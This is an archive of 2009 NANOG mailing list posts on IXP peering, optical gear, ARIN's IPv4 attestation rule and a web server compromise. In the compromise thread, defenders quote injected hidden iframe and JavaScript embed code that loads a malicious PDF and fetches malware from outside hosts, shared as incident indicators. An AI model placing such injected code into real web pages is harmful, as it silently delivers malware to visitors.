Re: IXP

2009-04-20 Thread Alan Hannan


A solution I put in place at UUnet circa 1997 was to take a set of /32 
routes representing major destination, e.g. ISP web sites, content 
sites, universities, about 20 of them, and temporarily place a /32 
static route to each participant at the public exchange and traceroute 
to the destination.


In this manner one can build a matrix to see how each participant gets 
to each destination.


When we found someone sending traffic to us with whom we were not 
peering, it was only a small bit of work to contact the ISP and ask them 
to fix the error.  One guy whose initial were GBO fixed it several 
times if I remember correctly.  I wonder how prevalent third-party next 
hops (here share my peering!) are nowadays?


From time to time it was interesting to watch peers and see when they 
figured out others were using them for transit.


BTW, I wonder how many folks did do the ICMP acl stuff.  We never did it 
at UUNET that I remember.  In 1997 I know the routers could handle the 
ACL, at least as well as routers in those days could be said to handle 
traffic.  The guy that taught it to me had the initial NS over a 
margarita at Rio Grande.


Completely preventing the potential for the problem is superior to 
detecting it.  But at the time, without a clear method for preventing 
it, detection was good.  I remember MFS tried to implement mac filters 
but bugs in the code rendered it a moot exercise.


-alan

vijay gill wrote:

If you are unfortunate enough to have to peer at a public exchange
point, put your public ports into a vrf that has your routes. 


On 4/18/09, Jeff Young yo...@jsyoung.net wrote:
  

Best solution I ever saw to an 'unintended' third-party
peering was devised by a pretty brilliant guy (who can
pipe up if he's listening).  


On Apr 18, 2009, at 11:35 AM, Nick Hilliard wrote

On 18/04/2009 01:08, Paul Vixie wrote:
  

pointing default, 




  





Re: So I've got this 2.5gig wave, what do I do with it?

2009-04-20 Thread David Reader
On Fri, 17 Apr 2009 15:02:29 -0400
Eric Van Tol e...@atlantech.net wrote:

  -Original Message-
  From: Eric Van Tol [mailto:e...@atlantech.net]
  Sent: Friday, April 17, 2009 2:44 PM
  To: nanog@nanog.org
  Subject: RE: So I've got this 2.5gig wave, what do I do with it?
  
   -Original Message-
   From: Kevin Hunt [mailto:kh...@huntbrothers.com]
   Sent: Friday, April 17, 2009 12:28 PM
   To: w...@loopfree.net; nanog@nanog.org
   Subject: Re: So I've got this 2.5gig wave, what do I do with it?
  
  
   I haven't used MRV but they look appealing, would love to hear other
  folks
   experience with them as I'm about to have to turn another two of these
   up...
  
   --
  
  We use the MRV LamdaDrivers and they work well.  We use the EM2009-G2 on
  our own dark fiber loops and provide dual GE connectivity on a single 2.5G
  wavelength.  Equipment is pretty barebones, but quite solid.  Management
  module can be rebooted without loss of light on any interfaces (besides
  those terminated on the management module, of course).  There's plenty of
  options for SFPs wrt distances.  However, since the OP is receiving a lit
  signal from the carrier, I'm not entirely sure it will work in his case,
  as I *believe* the trunk port requires a WDM SFP, not a standard
  850/1310/1550.  I could certainly be wrong, though.
  
  -evt
 
 Sorry to respond to my own post, but I was getting the EM2009-GM2 mixed up 
 with another module we use.  We do use the EM2009-GM2, but it does not have 
 an SFP trunk port - it's just a pair of SC connectors on the trunk side.  
 Looks like it can be configured for a specific wavelength by the setting of 
 some jumpers on the module, and it looks like 1310 is possible.

http://www.undone.org.uk/em2009-gm2.jpg

The modules we have use SFPs for both Access  Trunk (WDM) ports.

The only jumpers on the boards, to my recollection, are to choose between 
Gigabit Ethernet
or Fibre Channel line protocol on the access ports. The trunk port protocol is 
mrv proprietary
at two-and-a-bit Gbit/sec (2x GigE + TDM overhead).

My understanding is that they'll support any sane choice of SFP (some MRV SFPs 
are clearly
NOT sane choices for this card, such as the digital video coax module..)

MRV SFP modules sold as multirate or OC48 types can be used for the trunk port. 
We have some
of these cards running with normal 1310nm SFPs in the trunk ports where we 
only require
two Gbit services over a single fibre pair.

I can't comment on interop with other carriers' systems - we only use these on 
end-to-end
dark fibre.

MRV may able to advise whether or not their trunk protocol is likely to pass 
through
transponders (which may well try to reshape/retime) designed to transport 
SONET/SDH.

d.





Re: Malicious code just found on web server

2009-04-20 Thread Jake Mailinglists
Paul,
I noticed that in the PDF file but as the domain doesn't seem to have
resolution I didn't mention it.

Jake

WHOIS information on the domain

Whois Record

domain: TEST1.RU
type:   CORPORATE
nserver:ns1.centerhost.ru.
nserver:ns1.cetis.ru.
state:  REGISTERED, DELEGATED
org:Center of Effective Technologies and Systems CETIS
phone:  +7 4957711654
fax-no: +7 4957879251
e-mail: 
http://www.domaintools.com/registrant-search/?email=f6261250d87c80094b7a5eb64d324e5a
e-mail: 
http://www.domaintools.com/registrant-search/?email=acac76ec2f649d85219bdf7879b125ff
registrar:  REGRU-REG-RIPN
created:2001.03.30
paid-till:  2010.04.03
source: TC-RIPN

Registry Data  Created: 2001-03-30  Expires: 2010-04-03  Whois Server:
whois.ripn.net
 Server Data Domain Status:  Registered And No Website

On Fri, Apr 17, 2009 at 9:06 PM, Paul Ferguson fergdawgs...@gmail.comwrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

  On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills securin...@gmail.com
 wrote:


  I took a quick look at the code... formatted it in a pastebin here:
  http://pastebin.com/m7b50be54
 
  That javascript writes this to the page (URL obscured):
  document.write(embed
  src=\hXXp://
 77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|http://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown%7C
  U nknown|US|1.2.3.4\ width=\0\ height=\0\
  type=\application/pdf\/embed);
 
  The 1.2.3.4 in the URL is my public IP address (I changed that).
 
  Below the javascript, it grabs a PDF:
  embed src=include/two.pdf width=1 height=0
  style=border:none/embed
 
  That PDF is on the site, I haven't looked at it yet though.
 

 Not only is that .pdf malicious, when executed it also fetches additional
 malware from:

 hxxp:// test1.ru /1.1.1/load.php

 If that host is not in your block list, it should be -- known purveyor of
 crimeware.

 This is in addition to the other malicious URLs mentioned in this thread.

 - - ferg

 -BEGIN PGP SIGNATURE-
 Version: PGP Desktop 9.5.3 (Build 5003)

 wj8DBQFJ6Seaq1pz9mNUZTMRAsePAJ4ltJybvyViJoiTJDbIN9JCMjbZtgCgtOnI
 mxM8Ci/feKnJe6M6qbiESPw=
 =b0Yj
 -END PGP SIGNATURE-



 --
 Fergie, a.k.a. Paul Ferguson
  Engineering Architecture for the Internet
  fergdawgster(at)gmail.com
  ferg's tech blog: http://fergdawg.blogspot.com/




Re: Malicious code just found on web server 13E-7EB

2009-04-20 Thread Jake Mailinglists
On Mon, Apr 20, 2009 at 10:42 AM, Jake Mailinglists
jbabbinli...@gmail.comwrote:

 Paul,
 I noticed that in the PDF file but as the domain doesn't seem to have
 resolution I didn't mention it.

 Jake

 WHOIS information on the domain

 Whois Record

 domain: TEST1.RU
 type:   CORPORATE
 nserver:ns1.centerhost.ru.
 nserver:ns1.cetis.ru.
 state:  REGISTERED, DELEGATED
 org:Center of Effective Technologies and Systems CETIS
 phone:  +7 4957711654
 fax-no: +7 4957879251
 e-mail: 
 http://www.domaintools.com/registrant-search/?email=f6261250d87c80094b7a5eb64d324e5a
 e-mail: 
 http://www.domaintools.com/registrant-search/?email=acac76ec2f649d85219bdf7879b125ff
 registrar:  REGRU-REG-RIPN
 created:2001.03.30
 paid-till:  2010.04.03
 source: TC-RIPN

 Registry Data  Created: 2001-03-30  Expires: 2010-04-03  Whois Server:
 whois.ripn.net
  Server Data Domain Status:  Registered And No Website


 On Fri, Apr 17, 2009 at 9:06 PM, Paul Ferguson fergdawgs...@gmail.comwrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

  On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills securin...@gmail.com
 wrote:


  I took a quick look at the code... formatted it in a pastebin here:
  http://pastebin.com/m7b50be54
 
  That javascript writes this to the page (URL obscured):
  document.write(embed
  src=\hXXp://
 77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|http://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown%7C
  U nknown|US|1.2.3.4\ width=\0\ height=\0\
  type=\application/pdf\/embed);
 
  The 1.2.3.4 in the URL is my public IP address (I changed that).
 
  Below the javascript, it grabs a PDF:
  embed src=include/two.pdf width=1 height=0
  style=border:none/embed
 
  That PDF is on the site, I haven't looked at it yet though.
 

 Not only is that .pdf malicious, when executed it also fetches
 additional
 malware from:

 hxxp:// test1.ru /1.1.1/load.php

 If that host is not in your block list, it should be -- known purveyor of
 crimeware.

 This is in addition to the other malicious URLs mentioned in this thread.

 - - ferg

 -BEGIN PGP SIGNATURE-
 Version: PGP Desktop 9.5.3 (Build 5003)

 wj8DBQFJ6Seaq1pz9mNUZTMRAsePAJ4ltJybvyViJoiTJDbIN9JCMjbZtgCgtOnI
 mxM8Ci/feKnJe6M6qbiESPw=
 =b0Yj
 -END PGP SIGNATURE-



 --
 Fergie, a.k.a. Paul Ferguson
  Engineering Architecture for the Internet
  fergdawgster(at)gmail.com
  ferg's tech blog: http://fergdawg.blogspot.com/





Re: Malicious code just found on web server

2009-04-20 Thread Neil
On Fri, Apr 17, 2009 at 4:39 PM, Russell Berg b...@wins.net wrote:

 We just discovered what we suspect is malicious code appended to all
 index.html files on our web server as of the 11:00 central time hour today:

 src=http://77.92.158.122/webmail/inc/web/index.php;
 style=display: none; height=0 width=0/iframe
 iframe src=http://77.92.158.122/webmail/inc/web/index.php;
 style=display: none; height=0 width=0/iframe /body /html

 IP address resolves to mail.yaris.com; couldn't find any A/V site
 references to this.

 Google search reveals some Chinese sites with references to the URL today,
 but nothing substantial in the translation.

 Just a heads up for folks; we have a team investigating...

 Russell Berg
 Dir - Product Development
 Airstream Communications
 b...@wins.net
 715-832-3726


I've run into this sort of attack before, where they change the page to load
content from elsewhere; but I couldn't figure out how they managed to write
to the sites' pages.  They were hosted on a commercial webhost, and so if it
was a compromised host (which seemed like the only possibility to me), that
didn't speak well for the hosting company.

We were having issues with the company anyways, though; so I took down the
site, sanitized the pages (and removed a bunch of junk), and put the site
back up with another company.

But if you figure out how they got write access to a static website, I'd
love to hear it.

-N.


Re: Malicious code just found on web server

2009-04-20 Thread Paul Ferguson
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Mon, Apr 20, 2009 at 9:47 AM, Neil kngsp...@gmail.com wrote:

 I've run into this sort of attack before, where they change the page to
 load content from elsewhere; but I couldn't figure out how they managed
 to write to the sites' pages.  They were hosted on a commercial webhost,
 and so if it was a compromised host (which seemed like the only
 possibility to me), that didn't speak well for the hosting company.

 We were having issues with the company anyways, though; so I took down
 the site, sanitized the pages (and removed a bunch of junk), and put the
 site back up with another company.

 But if you figure out how they got write access to a static website, I'd
 love to hear it.


Most likely SQL injection. At any given time, there are hundreds of
thousands of legitimate websites out there that are unwittingly harboring
malicious code.

- - ferg

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.5.3 (Build 5003)

wj8DBQFJ7KtQq1pz9mNUZTMRAssaAKDYN8gqpZFaYPBOofGTjdtIbCDcSQCglwP0
W1CxTsNRR8vhO28Tq1LDm7M=
=TJbX
-END PGP SIGNATURE-



-- 
Fergie, a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawgster(at)gmail.com
 ferg's tech blog: http://fergdawg.blogspot.com/



Re: Malicious code just found on web server

2009-04-20 Thread Mike Lewinski

Paul Ferguson wrote:


Most likely SQL injection. At any given time, there are hundreds of
thousands of legitimate websites out there that are unwittingly harboring
malicious code.


Most of the MS-SQL injection attacks we see write malicious javascript 
into the DB itself so all query results include it. However, I'm not 
sure how easy it is to leverage to get system access - we've seen a 
number of compromised customer machines and there didn't appear to be 
any further compromise of them beyond the obvious. In the OP's case it 
sounds like static HTML files were altered. My bet is that an ftp or ssh 
account was brute forced.


Mike




Re: Malicious code just found on web server

2009-04-20 Thread Paul Ferguson
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Mon, Apr 20, 2009 at 10:23 AM, Mike Lewinski m...@rockynet.com wrote:

 Paul Ferguson wrote:

 Most likely SQL injection. At any given time, there are hundreds of
 thousands of legitimate websites out there that are unwittingly
 harboring
 malicious code.

 Most of the MS-SQL injection attacks we see write malicious javascript
 into the DB itself so all query results include it. However, I'm not sure
 how easy it is to leverage to get system access - we've seen a number of
 compromised customer machines and there didn't appear to be any further
 compromise of them beyond the obvious. In the OP's case it sounds like
 static HTML files were altered. My bet is that an ftp or ssh account was
 brute forced.


Yes -- SQL Injection directly into the HTML.

Happening all over the place, hundreds of thousands at a time --- we've
been trying to highlight the fact that improper configuration of web
services, unescaped configurations, etc., allow SQL injection to insert
code (e.g. JavaScript, iFrames, etc.)  directly into the HTML or Header.

See also:

http://en.wikipedia.org/wiki/Sql_injection#Real-world_examples

- - ferg

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.5.3 (Build 5003)

wj8DBQFJ7LKiq1pz9mNUZTMRAu3sAJ9MB6NH+qn8/idSbfqMk8TRQPzy5gCfb/QY
DUCdgzPRORtsLyfDFrfkgTw=
=Ar/O
-END PGP SIGNATURE-


-- 
Fergie, a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawgster(at)gmail.com
 ferg's tech blog: http://fergdawg.blogspot.com/



Re: Malicious code just found on web server

2009-04-20 Thread Paul Ferguson
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Mon, Apr 20, 2009 at 10:40 AM, Nick Chapman nicknetwo...@gmail.com
wrote:

 On Mon, Apr 20, 2009 at 12:47 PM, Neil kngsp...@gmail.com wrote:


 But if you figure out how they got write access to a static website, I'd
 love to hear it.


 Compromised FTP credentials would be my guess.  They can be obtained
 by brute force attacks or credential stealing trojans.


Yeah, it could have been any number of ways -- there has also been a huge
increase of SSH brute-force attacks in the past few weeks:

https://isc.sans.org/diary.html?storyid=6214

- - ferg


-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.5.3 (Build 5003)

wj8DBQFJ7LZrq1pz9mNUZTMRAvjkAJ9FLDn/KsLDrW9uIveQEw23ojaFbQCg7T6C
LZo3kISAfgBAfdbRSgUd878=
=vQAP
-END PGP SIGNATURE-


-- 
Fergie, a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawgster(at)gmail.com
 ferg's tech blog: http://fergdawg.blogspot.com/



Re: Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing

2009-04-20 Thread Valdis . Kletnieks
On Sat, 18 Apr 2009 03:21:06 BST, andrew.wallace said:
 The network community and the security community need to collaborate
 as much as possible to defeat the threats.
 
 I'm British and i'm hoping to make UK as secure as possible.

Umm. You missed the *very first* principle of proper security design.

It shouldn't be as secure as possible. It should be as secure as it
needs to be.

I mean, I suppose you *could* go with mil-spec security, where all materials
are kept in a locked safe under armed guard, and you had to fill out paperwork
for each piece of paper you took out of the safe, and then more paperwork
when you returned it.  But did you *really* want all that effort just to
check the headlines on bbc.com?


pgpSz12w06nD2.pgp
Description: PGP signature


RE: IXP

2009-04-20 Thread Deepak Jain
So here is an idea that I hope someone shoots down.

We've been talking about pseudo-wires, and the high level of expertise a 
shared-fabric IXP needs
to diagnose weird switch oddities, etc.

As far as I can tell, the principal reason to use a shared fabric is to allow 
multiple connections to networks
that may not justify their own dedicated () router port. Once they do, they 
can move over to a PNI. However, an IXP is (at the hardware level at least) 
trying to achieve any-to-any connectivity without concern for capacity up to 
the port size of each port on every flow. Scaling this to multiple pieces of 
hardware has posed interesting challenges when the connection speed to 
participants is of the same order as the interconnection between IXP switches.

So here is a hybrid idea, I'm not sure if It has been tried or seriously 
considered before.

Since the primary justification for a shared fabric is cost savings

What if everyone who participated at an IXP brought their own switch. For 
argument's sake, a Nexus 5xxx. It has 20+ ports of L2, wire speed 10G.

You connect 1-2 ports on your router, you order 18 cross-connects to your 
favorite peers. The IXP becomes a cross-connect provider (there is a business 
model bump that can be addressed here, TelX and others could address it). As 
you need more ports, you add them. A Nexus 5K runs about $500 per port. 

Here are some advantages. If you have 300 participants, yes, you have a lot of 
ports/switches. However, as interconnectivity increases, so does the total 
fabric capacity. Each additional switch does NOT add significant
complexity to the participants, but it does bring significant backplane and 
buffering capabilities. Each participant could then configure their own pVlans, 
Vlans or whatever on *their* switch. If they screw something up, it doesn't 
take everyone down.  A non-offending participant that interconnects with an 
offender can shut down
1 port (automatically or manually) without affecting the rest of their 
services. 

This also prevents the requirement of very complicated security features in the 
L2/L3 gray area.  If you don't want your peer to have multiple MACs, don't 
accept them. If you're cool with it, you can let it slide. 

If you want to move someone over to a PNI, the IXP needs to do zilch. You just 
move your cross-connect over to a new port on your service window, your peer 
can do it at the same or a different time, no big deal. If you *keep* it on a 
switch however, you can use LACP uplinks from the switches you have to provide 
say 40G uplinks to your router so large peers don't affect your ability to 
process traffic. I doubt however, that if this model is applied, there is much 
purpose for PNIs -- the cost savings model mostly vanishes. 

As you want to move to higher speeds (40G and 100G) the IXP has to do zilch. 
You can switch your ports or peers at anytime you choose or set up a separate 
fabric for your 100G peers. An upgrade in port density or capacity for a peer, 
or set of peers, does not require a forklift of the whole IXP or some strange 
speed shifting (other than in the affected parties). 

Disadvantages. It's probably cheaper on a per-participant basis than a shared 
fabric once it gets to be a certain size. It's a different model (many-to-many 
vs one-to-many) that many are used to. It requires interconnects to other 
participants (en masse) to be about the same as the per port cost of a shared 
fabric (this is probably achievable given what many places charge for 10G 
ports). Each participant is managing an additional type of gear. Theoretically 
if someone uses an Extreme and another uses a Cisco, there might be issues, but 
at a pure vanilla-L2/VLAN level, I'm pretty sure even 2nd and 3rd tier vendors 
can interconnect just fine.

I think this addresses the keep it as simple as possible without over 
simplifying. There is nothing new to this model except (perhaps) as its applied 
to an IXP. People have been aggregating traffic by ports into trunks by 
capacity for a long time. I haven't figured out why it hasn't really been done 
to scale at the IXP level.

Thoughts?

Deepak Jain
AiNET

 -Original Message-
 From: vijay gill [mailto:vg...@vijaygill.com]
 Sent: Monday, April 20, 2009 12:35 AM
 To: Jeff Young; Nick Hilliard; Paul Vixie; na...@merit.edu
 Subject: Re: IXP
 
 If you are unfortunate enough to have to peer at a public exchange
 point, put your public ports into a vrf that has your routes. Default
 will be suboptimal to debug.
 
 I must say stephen and vixie and (how hard this is to type) even
 richard steenbergens methodology makes the most sense going forward.
 Mostly to prevent self-inflicted harm on parts of the exchange
 participants. Will it work? Doubtful in todays internet clue level
 
 /vijay
 
 On 4/18/09, Jeff Young yo...@jsyoung.net wrote:
  Best solution I ever saw to an 'unintended' third-party
  peering was devised by a pretty brilliant guy (who can
  pipe up if 

RE: Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing

2009-04-20 Thread Deepak Jain
 On Sat, 18 Apr 2009 03:21:06 BST, andrew.wallace said:
  The network community and the security community need to collaborate
  as much as possible to defeat the threats.
 
  I'm British and i'm hoping to make UK as secure as possible.
 
 Umm. You missed the *very first* principle of proper security design.
 
 It shouldn't be as secure as possible. It should be as secure as it
 needs to be.
 
 I mean, I suppose you *could* go with mil-spec security, where all
 materials are kept in a locked safe under armed guard, and you had to
 fill out paperwork for each piece of paper you took out of the safe,
 and then more paperwork when you returned it.  But did you *really*
 want all that effort just to check the headlines on bbc.com?

Let's not ignore the fact that if you set unreasonably high security standards
most likely: a) twitter.com or bbc.com wouldn't exist because of the high
security scrutiny they'd have been under before being allowed to connect to 
anything and b) even if they didn't you wouldn't be able to see them because
of the high security scrutiny you'd be under before you were allowed to connect.

No one dies from an attack on twitter. Let the court/justice system deal with 
it whenever they get around to it. It keeps IT folks in jobs all over the 
place, gives the news things to write about, and gives the NANOG mail servers 
something to use the network for. 

Intelligence/security folks are tasked to deal with other things and with a 
real level of severity -- and it's quantifiable (at least in theory ;) ). 

Another point, security is ephemeral - A wall used to be the secure as 
possible solution to protect cities from invaders. An entertainment novelty in 
China rendered them obsolete when this black powder was reapplied to warfare. 
Some attacks (e.g. botnets) can only exist because we all have done a great job 
building networks over the last 15 years. Now we have new challenges. They all 
take their own time to mature and address.

Deepak Jain
AiNET



RE: IXP

2009-04-20 Thread Michael K. Smith - Adhost
Hello Deepak:

-Original Message-

So here is an idea that I hope someone shoots down.

We've been talking about pseudo-wires, and the high level of expertise a
shared-fabric IXP needs
to diagnose weird switch oddities, etc.

As far as I can tell, the principal reason to use a shared fabric is to
allow multiple connections to networks
that may not justify their own dedicated () router port. Once they
do, they can move over to a PNI. However, an IXP is (at the hardware
level at least) trying to achieve any-to-any connectivity without
concern for capacity up to the port size of each port on every flow.
Scaling this to multiple pieces of hardware has posed interesting
challenges when the connection speed to participants is of the same
order as the interconnection between IXP switches.

So here is a hybrid idea, I'm not sure if It has been tried or seriously
considered before.

Since the primary justification for a shared fabric is cost savings

What if everyone who participated at an IXP brought their own switch.
For argument's sake, a Nexus 5xxx. It has 20+ ports of L2, wire speed
10G.


[Michael K. Smith - Adhost] 

This sounds like fertile ground for unintended consequences.  Unmanaged
spanning tree topological changes as three people, previously connected
to their own switch and to others, now decide to connect to each other
as well, using those inexpensive L2 ports.

Regards,

Mike 



Re: IXP

2009-04-20 Thread Niels Bakker

* dee...@ai.net (Deepak Jain) [Mon 20 Apr 2009, 23:25 CEST]:

So here is an idea that I hope someone shoots down.

We've been talking about pseudo-wires, and the high level of expertise a 
shared-fabric IXP needs to diagnose weird switch oddities, etc.

[..]
What if everyone who participated at an IXP brought their own switch. 
For argument's sake, a Nexus 5xxx. It has 20+ ports of L2, wire speed 
10G.


You didn't Cc: randy bush and I assume he's been delete-threading this 
so I'll say it instead: I encourage all my competitors to try this.


You do realise, I hope, that the ability to diagnose weird switch 
oddities decreases pretty radically when the switch is outside one's 
administrative control, right?


Ethernet has no administrative boundaries that can be delineated. 
Spanning one broadcast domain across multiple operators is therefore 
a recipe for disaster.  Attempts to limit this will fail as there is no 
enforcement possible in such a cooperative environment except yelling 
after the fact and frantic mailing during meltdowns.  I don't think I 
need to spell out how quick hacks will severely restrict scalability.


Cheap, fast, secure.  It is obvious which two Ethernet chose.


-- Niels.

--
We humans get marks for consistency. We always opt for
 civilization after exhausting the alternatives.
-- Carl Guderian



Important New Requirement for IPv4 Requests

2009-04-20 Thread Joe Greco
Forwarded message:
 Subject: Important New Requirement for IPv4 Requests
 From: ARIN Registration Services do-not-re...@arin.net
 
 Hello,
 
 With the approaching depletion of the IPv4 address free pool, the 
 ARIN Board of Trustees has directed ARIN staff to take additional 
 steps to ensure the legitimacy of all IPv4 address space requests. 
 Beginning 18 May 2009, ARIN will require that all applications for 
 IPv4 address space include an attestation of accuracy from an officer 
 of the organization. For more information on this requirement, please 
 see:
 
 https://www.arin.net/resources/agreements/officer_attest.html
 
 Whenever a request for IPv4 resources is received, ARIN will ask in 
 its initial reply for the name and contact information of an officer 
 of the organization who will be able to attest to the validity of the 
 information provided to ARIN.
 
 At the point a request is ready to be approved, ARIN will send a summary 
 of the request (via e-mail) to the officer with a cc: to the requesting 
 POC (Tech or Admin) and ask the officer to attest to the validity of the 
 information provided to ARIN. The summary will provide a brief overview 
 of the request and an explanation of the required attestation. ARIN will 
 include the original request template and any other relevant information 
 the requestor provided.  Once ARIN receives the attestation from the 
 officer, the request can be approved. Attestation may also be provided 
 via fax or postal mail.  
 
 For further assistance, contact ARIN's Registration Services Help Desk 
 via e-mail to hostmas...@arin.net or telephone at +1.703.227.0660.

Let me see if I can understand this.

We're running out of IPv4 space.

Knowing that blatant lying about IP space justifications has been an
ongoing game in the community, ARIN has decided to do something about
it.

So now they're going to require an attestation.  Which means that they
are going to require an officer to attest to the validity of the
information.

So the officer, most likely not being a technical person, is going to
contact ...  probably the same people who made the request, ask them if
they need the space.  Right?

And why would the answer be any different, now?

... JG
-- 
Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net
We call it the 'one bite at the apple' rule. Give me one chance [and] then I
won't contact you again. - Direct Marketing Ass'n position on e-mail spam(CNN)
With 24 million small businesses in the US alone, that's way too many apples.



Re: Important New Requirement for IPv4 Requests

2009-04-20 Thread Brandon Galbraith
On Mon, Apr 20, 2009 at 6:39 PM, Joe Greco jgr...@ns.sol.net wrote:


 So now they're going to require an attestation.  Which means that they
 are going to require an officer to attest to the validity of the
 information.

 So the officer, most likely not being a technical person, is going to
 contact ...  probably the same people who made the request, ask them if
 they need the space.  Right?

 And why would the answer be any different, now?

 ... JG
 --


Easier to take back resources if an officer of the company lied regarding
their usage/need, no? Just a thought, although I am by no means an expert in
the field of contract law.

-brandon
-- 
Brandon Galbraith
Voice: 630.400.6992


Re: Important New Requirement for IPv4 Requests

2009-04-20 Thread manolo

Joe Greco wrote:

Forwarded message:
  

Subject: Important New Requirement for IPv4 Requests
From: ARIN Registration Services do-not-re...@arin.net

Hello,

With the approaching depletion of the IPv4 address free pool, the 
ARIN Board of Trustees has directed ARIN staff to take additional 
steps to ensure the legitimacy of all IPv4 address space requests. 
Beginning 18 May 2009, ARIN will require that all applications for 
IPv4 address space include an attestation of accuracy from an officer 
of the organization. For more information on this requirement, please 
see:


https://www.arin.net/resources/agreements/officer_attest.html

Whenever a request for IPv4 resources is received, ARIN will ask in 
its initial reply for the name and contact information of an officer 
of the organization who will be able to attest to the validity of the 
information provided to ARIN.


At the point a request is ready to be approved, ARIN will send a summary 
of the request (via e-mail) to the officer with a cc: to the requesting 
POC (Tech or Admin) and ask the officer to attest to the validity of the 
information provided to ARIN. The summary will provide a brief overview 
of the request and an explanation of the required attestation. ARIN will 
include the original request template and any other relevant information 
the requestor provided.  Once ARIN receives the attestation from the 
officer, the request can be approved. Attestation may also be provided 
via fax or postal mail.  

For further assistance, contact ARIN's Registration Services Help Desk 
via e-mail to hostmas...@arin.net or telephone at +1.703.227.0660.



Let me see if I can understand this.

We're running out of IPv4 space.

Knowing that blatant lying about IP space justifications has been an
ongoing game in the community, ARIN has decided to do something about
it.

So now they're going to require an attestation.  Which means that they
are going to require an officer to attest to the validity of the
information.

So the officer, most likely not being a technical person, is going to
contact ...  probably the same people who made the request, ask them if
they need the space.  Right?

And why would the answer be any different, now?

... JG
  
So I wonder if this applies to some of the players who have recently 
gotten a /19 for dubious purposes and are so large that an officer  of 
the company may be 1500 miles away. It's a sad state of affairs. Are 
they going to hold the officer liable if the request is not legit?







Manny


Re: Important New Requirement for IPv4 Requests

2009-04-20 Thread David Andersen

On Apr 20, 2009, at 7:39 PM, Joe Greco wrote:

We're running out of IPv4 space.

Knowing that blatant lying about IP space justifications has been an
ongoing game in the community, ARIN has decided to do something  
about

it.

So now they're going to require an attestation.  Which means that they
are going to require an officer to attest to the validity of the
information.

So the officer, most likely not being a technical person, is going  
to
contact ...  probably the same people who made the request, ask them  
if

they need the space.  Right?

And why would the answer be any different, now?


Just a thought:  A technical person might be very happy to lie to a  
toothless organization that holds no real sway over him or her, won't  
revoke the address space once granted, and for whom the benefit of  
lots of address space in which to play exceeds any potential pain from  
being caught, er, exaggerating their need for address space.


That same technical person might be less inclined to lie to a director  
of their company who asks:  Are you asking me to attest, publicly and  
perhaps legally, that this information is correct?  If you're wrong  
and you make an ass of me, it's going to be yours that goes out the  
door.


Seems like a reasonable experiment to try, at least.

  -Dave


PGP.sig
Description: This is a digitally signed message part


Re: Important New Requirement for IPv4 Requests

2009-04-20 Thread Chris Owen

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Apr 20, 2009, at 9:04 PM, David Andersen wrote:

Just a thought:  A technical person might be very happy to lie to a  
toothless organization that holds no real sway over him or her,  
won't revoke the address space once granted, and for whom the  
benefit of lots of address space in which to play exceeds any  
potential pain from being caught, er, exaggerating their need for  
address space.


That same technical person might be less inclined to lie to a  
director of their company who asks:  Are you asking me to attest,  
publicly and perhaps legally, that this information is correct?  If  
you're wrong and you make an ass of me, it's going to be yours that  
goes out the door.


Seems like a reasonable experiment to try, at least.



I agree there is no harm in the idea but as I was reading the  
announcement this morning I couldn't help but think Too little, too  
late.


Chris

- --
Chris Owen - Garden City (620) 275-1900 -  Lottery (noun):
President  - Wichita (316) 858-3000 -A stupidity tax
Hubris Communications Inc  www.hubris.net
- --




-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (Darwin)
Comment: Public Key: http://home.hubris.net/owenc/pgpkey.txt
Comment: Public Key ID: 0xB513D9DD

iEYEARECAAYFAkntKl0ACgkQElUlCLUT2d0engCgk3EJW7uu0j9p0ArLjRmZHseP
cLMAnRqYov8CwxkF1E1pxP4zktUhA+HS
=i5o1
-END PGP SIGNATURE-



Re: Important New Requirement for IPv4 Requests

2009-04-20 Thread Shane Ronan
I don't believe I saw anywhere that these attestations were being made  
under penalty of perjury or any other method of civil punishment. Do  
they have to notarized?


What are the real benefits here, other then putting more people to  
work at ARIN and increase the workload of those who really do need new  
IP space.


Shane Ronan

On Apr 20, 2009, at 7:04 PM, David Andersen wrote:

Are you asking me to attest, publicly and perhaps legally, that  
this information is correct?





RE: Important New Requirement for IPv4 Requests

2009-04-20 Thread Aaron Wendel
I think this needlessly involves people who probably don't have a clue in an
area we may not really want them involved in.  I can hear the conversation
now:

Officer:  Why do I have to sign this thing?

Tech:  Well your graciousness.  We are coming to the end of the available
address space and the gods at ARIN want to make you aware of that so you
might approve that request I made for new equipment to deploy IPv6 with.

Officer:  Huh?  Do we need it?

Tech: Yes, we need the address space.

Officer: And they're running out?

Tech:  Well out of the v4 space which is what we use now but we can move to
v6 space and...

Officer:  Hell, request 10x as much space!  I'll sign anything as long as
we don't run out and have to spend money! 


For me, I request all the allocations and I'm also an officer of the company
so I'll just attest to my own stuff but I can see this would be a nightmare
in a larger company.

There was also an e-mail about outreach to the CEOs of all the companies
with resources.  At my company the CEO will hand it to me without even
opening it.  I assume that in many larger companies it might get glanced
at by the CEO or CEOs secretary before it gets shredded.

While I completely understand the reasons behind both initiatives I don't
think they'll have the desired effect.

Aaron




-Original Message-
From: Matthew Moyle-Croft [mailto:m...@internode.com.au] 
Sent: Monday, April 20, 2009 9:56 PM
To: Joe Greco
Cc: nanog@nanog.org
Subject: Re: Important New Requirement for IPv4 Requests

ARIN should ask companies to demonstrate:

- demonstration of routing of an IPv6 range/using IPv6 address space
- demonstration of services being offered over IPv6
